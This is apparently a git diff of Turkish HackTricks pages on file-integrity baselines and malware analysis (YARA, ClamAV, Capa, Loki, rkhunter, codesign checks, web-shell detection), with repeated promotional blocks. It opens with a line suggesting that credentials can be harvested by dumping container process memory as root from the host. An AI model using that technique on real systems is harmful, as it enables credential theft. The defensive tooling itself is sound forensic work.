Dikkat edin, bir ana makine içinde bir docker konteyneri çalıştırdığınızda **ana makineden konteynerde çalışan işlemleri görebilirsiniz** sadece `ps -ef` komutunu çalıştırarak
Bu nedenle (root olarak), ana bilgisayardan işlemlerin belleğini **dökerek** ve [**aşağıdaki örnekte olduğu gibi**](../../linux-hardening/privilege-escalation/#process-memory) **kimlik bilgilerini arayabilirsiniz**.
Bu nedenle (kök olarak) ana makineden işlemlerin belleğini **dökerek** ve [**aşağıdaki örnekte olduğu gibi**](../../linux-hardening/privilege-escalation/#process-memory) **kimlik bilgilerini arayabilirsiniz**.
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'i öğrenin</strong>!</summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,31 +1,32 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# Temel Çizgi
# Başlangıç
Bir temel çizgi, bir sistemin belirli bölümlerinin anlık bir görüntüsünü alarak, gelecekteki bir durumla karşılaştırarak değişiklikleri vurgulamak için kullanılır.
Bir başlangıç, bir sistemin belirli parçalarının anlık bir görüntüsünü alarak **gelecekteki bir durumla karşılaştırmak ve değişiklikleri vurgulamak** için oluşturulan bir referans noktasıdır.
Örneğin, dosya sisteminin her dosyasının karma değerini hesaplayıp depolayarak, hangi dosyaların değiştirildiğini bulabilirsiniz.\
Bu aynı zamanda oluşturulan kullanıcı hesapları, çalışan işlemler, çalışan hizmetler ve değişmemesi gereken veya hiç değişmemesi gereken diğer herhangi bir şey için de yapılabilir.
Örneğin, dosya sistemindeki her dosyanın karma değerini hesaplayıp depolayarak hangi dosyaların değiştirildiğini bulabilirsiniz.\
Bu aynı zamanda oluşturulan kullanıcı hesapları, çalışan işlemler, çalışan servisler ve değişmemesi gereken veya hiç değişmemesi gereken diğer herhangi bir şey için de yapılabilir.
## Dosya Bütünlük İzleme
## Dosya Bütünlüğü İzleme
Dosya Bütünlük İzleme (FIM), dosyalardaki değişiklikleri takip ederek IT ortamlarını ve verileri koruyan kritik bir güvenlik tekniğidir. İki temel adımdan oluşur:
Dosya Bütünlüğü İzleme (FIM), dosyalardaki değişiklikleri izleyerek IT ortamlarını ve verileri koruyan kritik bir güvenlik tekniğidir. İki temel adım içerir:
1. **Temel Çizgi Karşılaştırması:** Gelecekteki karşılaştırmalar için dosya öznitelikleri veya kriptografik karma değerleri (MD5 veya SHA-2 gibi) kullanarak bir temel çizgi oluşturun ve değişiklikleri tespit edin.
2. **Gerçek Zamanlı Değişiklik Bildirimi:** Dosyalara erişildiğinde veya değiştirildiğinde anında uyarılar alınır, genellikle işletim sistemi çekirdek uzantıları aracılığıyla yapılır.
1. **Başlangıç Karşılaştırması:** Gelecekteki karşılaştırmalar için dosya öznitelikleri veya kriptografik karma değerleri (örneğin MD5 veya SHA-2) kullanarak bir başlangıç oluşturun ve değişiklikleri tespit etmek için.
2. **Gerçek Zamanlı Değişiklik Bildirimi:** Dosyalara erişildiğinde veya değiştirildiğinde anında uyarılar alın, genellikle işletim sistemi çekirdek uzantıları aracılığıyla.
## Araçlar
@ -37,16 +38,17 @@ Dosya Bütünlük İzleme (FIM), dosyalardaki değişiklikleri takip ederek IT o
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# Zararlı Yazılım Analizi
# Kötü Amaçlı Yazılım Analizi
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **pull request** göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Forensik Hile Kağıtları
## Adli Bilişim Hile Sayfaları
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
@ -34,27 +35,23 @@ HackTricks'i desteklemenin diğer yolları:
```bash
sudo apt-get install -y yara
```
#### Kuralları Hazırla
#### Kuralları hazırlayın
Bu betiği kullanarak github'dan tüm yara kötü amaçlı yazılım kurallarını indirin ve birleştirin: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
_**rules**_ dizinini oluşturun ve betiği çalıştırın. Bu, _**malware\_rules.yar**_ adında tüm yara kurallarını içeren bir dosya oluşturacaktır.
_**rules**_ adında bir dizin oluşturun ve betiği çalıştırın. Bu, kötü amaçlı yazılımlar için tüm yara kurallarını içeren _**malware\_rules.yar**_ adlı bir dosya oluşturacaktır.
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```
#### Tarama
Malware analizi yaparken, ilk adım olarak zararlı yazılımı taramanız gerekmektedir. Bu, zararlı yazılımın dosya sisteminde veya bellekte var olup olmadığını kontrol etmek anlamına gelir. Tarama işlemi, zararlı yazılımın imzalarını veya davranışsal özelliklerini algılamak için kullanılan antivirüs programları veya özel araçlar kullanılarak gerçekleştirilebilir.
Tarama sonucunda zararlı yazılım tespit edilirse, bu, analiz sürecinin devam etmesi gerektiği anlamına gelir. Zararlı yazılım tespit edilmezse, analiz süreci sonlandırılabilir veya başka bir yöntem denenebilir.
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: Zararlı yazılım kontrolü ve kurallar oluşturma
[**YaraGen**](https://github.com/Neo23x0/yarGen) aracını kullanarak bir ikilik dosyadan yara kuralları oluşturabilirsiniz. Bu öğreticilere göz atın: [**Bölüm 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Bölüm 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Bölüm 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
[**YaraGen**](https://github.com/Neo23x0/yarGen) adlı aracı kullanarak bir ikiliden yara kuralları oluşturabilirsiniz. Bu eğitimlere göz atın: [**Bölüm 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Bölüm 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Bölüm 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
@ -62,56 +59,10 @@ python3.exe yarGen.py --excludegood -m ../../mals/
### ClamAV
#### Kurulum
ClamAV, açık kaynaklı bir antivirüs yazılımıdır. Bir sistemde kötü amaçlı yazılımları tespit etmek ve temizlemek için kullanılır. ClamAV'yi kurmak için aşağıdaki adımları izleyin:
1. **Ubuntu/Debian**:
```bash
sudo apt-get update
sudo apt-get install clamav
```
2. **CentOS/RHEL**:
```bash
sudo yum update
sudo yum install clamav
```
3. **Fedora**:
```bash
sudo dnf update
sudo dnf install clamav
```
4. **MacOS** (Homebrew kullanarak):
```bash
brew update
brew install clamav
```
5. **Windows**:
ClamAV'nin Windows sürümünü [buradan](https://www.clamav.net/downloads#otherversions) indirin ve kurulum sihirbazını takip edin.
6. Kurulum tamamlandıktan sonra, ClamAV'yi güncellemek için aşağıdaki komutu çalıştırın:
```bash
sudo freshclam
```
ClamAV başarıyla kurulduğunda, kötü amaçlı yazılımları tespit etmek ve temizlemek için kullanabilirsiniz.
```
sudo apt-get install -y clamav
```
#### Tarama
Malware analizi yaparken, ilk adım olarak zararlı yazılımı taramanız gerekmektedir. Bu, zararlı yazılımın dosya sisteminde veya bellekte var olup olmadığını kontrol etmek anlamına gelir. Tarama işlemi, zararlı yazılımın imzalarını veya davranışsal özelliklerini algılamak için kullanılan antivirüs programları veya özel araçlar kullanılarak gerçekleştirilebilir.
Tarama sonucunda zararlı yazılım tespit edilirse, bu, analiz sürecinin devam etmesi gerektiği anlamına gelir. Zararlı yazılım tespit edilmezse, analiz süreci sonlandırılabilir veya başka bir yöntem denenebilir.
```bash
sudo freshclam #Update rules
clamscan filepath #Scan 1 file
@ -119,26 +70,26 @@ clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa**, PE, ELF, .NET gibi yürütülebilir dosyalarda potansiyel olarak zararlı yetenekleri tespit eder. Bu nedenle, Att\&ck taktikleri veya şüpheli yetenekler gibi şeyleri bulur:
**Capa**, yürütülebilir dosyalardaki (PE, ELF, .NET) potansiyel olarak kötü niyetli **yetenekleri** tespit eder. Bu nedenle Att\&ck taktikleri gibi şeyleri veya şüpheli yetenekleri bulacaktır:
- OutputDebugString hatası kontrolü yapar
- Bir hizmet olarak çalışır
- İşlem oluşturur
- OutputDebugString hatasını kontrol et
- bir hizmet olarak çalıştır
- işlem oluştur
[**Github deposunda**](https://github.com/mandiant/capa) bulabilirsiniz.
[**Github deposundan**](https://github.com/mandiant/capa) edinin.
### IOC'ler
IOC, Compromise Göstergesi anlamına gelir. IOC, bazı potansiyel istenmeyen yazılımları veya doğrulanmış kötü amaçlı yazılımları tanımlayan koşullar kümesidir. Mavi Takımlar, bu tür tanımları sistemlerinde ve ağlarında bu tür kötü amaçlı dosyaları aramak için kullanır.\
Bu tanımları paylaşmak, bir bilgisayarda kötü amaçlı yazılım tespit edildiğinde ve bu kötü amaçlı yazılım için bir IOC oluşturulduğunda, diğer Mavi Takımların kötü amaçlı yazılımı daha hızlı tanımlamasına yardımcı olur.
IOC, Tehdit Belirtici anlamına gelir. Bir IOC, bazı potansiyel istenmeyen yazılımları veya onaylanmış **zararlı yazılımları tanımlayan koşullar** kümesidir. Mavi Takımlar, bu tür kötü niyetli dosyaları **sistemlerinde** ve **ağlarında aramak** için bu tür tanımlamaları kullanır.\
Bu tanımlamaları paylaşmak, bir bilgisayarda zararlı yazılım tanımlandığında ve o zararlı yazılım için bir IOC oluşturulduğunda, diğer Mavi Takımların zararlı yazılımı daha hızlı tanımlamasına yardımcı olabilir.
IOC oluşturmak veya değiştirmek için bir araç [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**'dır**.\
IOC'ler oluşturmak veya değiştirmek için bir araç [**IOC Düzenleyici**](https://www.fireeye.com/services/freeware/ioc-editor.html)**'dir.**\
[**Redline**](https://www.fireeye.com/services/freeware/redline.html) gibi araçları kullanarak bir cihazda tanımlanmış IOC'leri arayabilirsiniz.
### Loki
[**Loki**](https://github.com/Neo23x0/Loki), Basit Kompromis Göstergeleri için bir tarayıcıdır.\
Tespit, dört tespit yöntemine dayanır:
[**Loki**](https://github.com/Neo23x0/Loki), Basit Tehdit Belirteçleri için bir tarayıcıdır.\
Tespit, dört tespit yöntemine dayanmaktadır:
```
1. File Name IOC
Regex match on full file path/name
@ -154,41 +105,41 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux Zararlı Yazılım Tespiti
[**Linux Zararlı Yazılım Tespiti (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/), GNU GPLv2 lisansı altında yayınlanan bir Linux zararlı yazılım tarayıcısıdır ve paylaşımlı barındırılan ortamlarda karşılaşılan tehditlere odaklanmıştır. Saldırılarda aktif olarak kullanılan zararlı yazılımları tespit etmek ve tespit için imzalar oluşturmak için ağ kenarı sızma tespit sistemlerinden tehdit verileri kullanır. Ayrıca, tehdit verileri LMD kontrol özelliği ve zararlı yazılım topluluk kaynaklarından kullanıcı gönderimlerinden de elde edilir.
[**Linux Zararlı Yazılım Tespiti (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/), GNU GPLv2 lisansı altında yayınlanan, paylaşımlı barındırma ortamlarında karşılaşılan tehditlere odaklanılarak tasarlanmış bir Linux zararlı yazılım tarayıcısıdır. Ağ kenarı sızma tespit sistemlerinden tehdit verileri kullanarak saldırılarda aktif olarak kullanılan zararlı yazılımları çıkartır ve tespit için imzalar oluşturur. Ayrıca, tehdit verileri, LMD ödeme özelliği ve zararlı yazılım topluluk kaynaklarından da elde edilebilir.
### rkhunter
[**rkhunter**](http://rkhunter.sourceforge.net) gibi araçlar, dosya sisteminde olası **rootkit** ve zararlı yazılım taraması yapmak için kullanılabilir.
[**rkhunter**](http://rkhunter.sourceforge.net) gibi araçlar, dosya sistemini olası **rootkit**ler ve zararlı yazılımlar için kontrol etmek için kullanılabilir.
```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss) farklı teknikler kullanarak yürütülebilir dosyalarda şifrelenmiş dizeleri bulmaya çalışan bir araçtır.
[**FLOSS**](https://github.com/mandiant/flare-floss) farklı teknikler kullanarak yürütülebilir dosyalar içinde şifrelenmiş dizeleri bulmaya çalışan bir araçtır.
### PEpper
[PEpper](https://github.com/Th3Hurrican3/PEpper), yürütülebilir dosyanın içindeki bazı temel bilgileri kontrol eder (ikili veri, entropi, URL'ler ve IP'ler, bazı yara kuralları).
[PEpper ](https://github.com/Th3Hurrican3/PEpper) yürütülebilir dosyanın içinde bazı temel bilgileri kontrol eder (ikili veri, entropi, URL'ler ve IP'ler, bazı yara kuralları).
### PEstudio
[PEstudio](https://www.winitor.com/download), Windows yürütülebilir dosyalarının içindeki ithalatlar, ihracatlar, başlıklar gibi bilgileri almanızı sağlayan bir araçtır, ayrıca virüs taraması yapar ve potansiyel Att\&ck tekniklerini bulur.
[PEstudio](https://www.winitor.com/download) Windows yürütülebilir dosyalar hakkında bilgi almayı sağlayan bir araçtır; içeri aktarmaları, dışarı aktarmaları, başlıkları kontrol eder, ayrıca virüs toplamını kontrol eder ve potansiyel Att\&ck tekniklerini bulur.
### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/), bir dosyanın **şifreli** olup olmadığını ve **paketleyicileri** bulmayı sağlayan bir araçtır.
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) bir dosyanın **şifreli** olup olmadığını tespit etmek ve **paketleyicileri** bulmak için bir araçtır.
### NeoPI
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI), metin/skript dosyalarında **şifrelenmiş** ve **şifrelenmiş** içeriği tespit etmek için çeşitli **istatistiksel yöntemler** kullanan bir Python betiğidir. NeoPI'nin amaçlanan amacı, gizli web kabuk kodunun tespitine yardımcı olmaktır.
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) metin/skript dosyaları içindeki **şifrelenmiş** ve **şifrelenmiş** içeriği tespit etmek için çeşitli **istatistiksel yöntemler** kullanan bir Python betiğidir. NeoPI'nin amaçlanan amacı, **gizli web kabuk kodunun tespitine yardımcı olmaktır**.
### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder), **şifrelenmiş**/**şüpheli kodu** ve **malware**/web kabuklarında sıa kullanılan **PHP** işlevlerini kullanan dosyaları tespit etmek için elinden geleni yapar.
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) **şifrelenmiş**/**şüpheli kodları** tespit etmek için elinden geleni yapar ve genellikle **kötü amaçlı yazılımlarda**/web kabuklarında kullanılan **PHP** işlevlerini kullanan dosyaları tespit eder.
### Apple Binary İmzaları
### Apple Binary Signatures
Bir **malware örneği** kontrol ederken, yürütülebilir dosyanın **imzasını kontrol etmek** her zaman önemlidir, çünkü imzayı atan **geliştirici** zaten **malware ile ilişkili** olabilir.
Bazı **kötü amaçlı yazılım örneğini** kontrol ederken, binary'nin **imzasını kontrol etmek** her zaman önemlidir çünkü imzayı atan **geliştirici** muhtemelen zaten **kötü amaçlı yazılımla ilişkilidir**.
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -199,16 +150,31 @@ codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app
```
## Tespit Teknikleri
## Algılama Teknikleri
### Dosya Yığıtı
### Dosya Yığma
Eğer bir web sunucusunun **dosyalarını içeren bir klasörün** en son ne zaman güncellendiğini biliyorsanız. **Web sunucusundaki tüm dosyaların oluşturulma ve değiştirilme tarihlerini kontrol edin** ve herhangi bir tarih **şüpheli** ise o dosyayı kontrol edin.
Eğer bir web sunucusunun **dosyalarını** içeren bir klasörün **en son ne zaman güncellendiğini** biliyorsanız. **Web sunucusundaki tüm dosyaların oluşturulma ve değiştirilme tarihlerini kontrol edin** ve herhangi bir tarih **şüpheli** ise o dosyayı kontrol edin.
### Temel Çizgiler
Bir klasörün dosyalarının **değiştirilmemesi gerektiğini** biliyorsanız, klasörün **orijinal dosyalarının karma değerini hesaplayabilir** ve onları **mevcut olanlarla karşılaştırabilirsiniz**. Değiştirilen herhangi bir şey **şüpheli** olacaktır.
Bir klasörün dosyalarının **değiştirilmemesi gerektiğini** biliyorsanız, klasörün **orijinal dosyalarının** **hash'ini hesaplayabilir** ve **şu anki** dosyalarla **karşılaştırabilirsiniz**. Herhangi bir değiştirilen dosya **şüpheli** olacaktır.
### İstatistiksel Analiz
Bilgiler loglarda kaydedildiğinde, bir web sunucusunun her bir dosyasının kaç kez erişildiğini gibi **istatistikleri kontrol edebilirsiniz**, çünkü bir web kabuğu en çok olanlardan biri olabilir.
Bilgiler loglarda kaydedildiğinde, her bir web sunucusu dosyasının kaç kez erişildiği gibi istatistikleri **kontrol edebilirsiniz**, çünkü bir web kabuğu en çok olanlardan biri olabilir.
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}

View file

@ -1,28 +1,29 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
# Kesme araçları
# Oyma araçları
## Autopsy
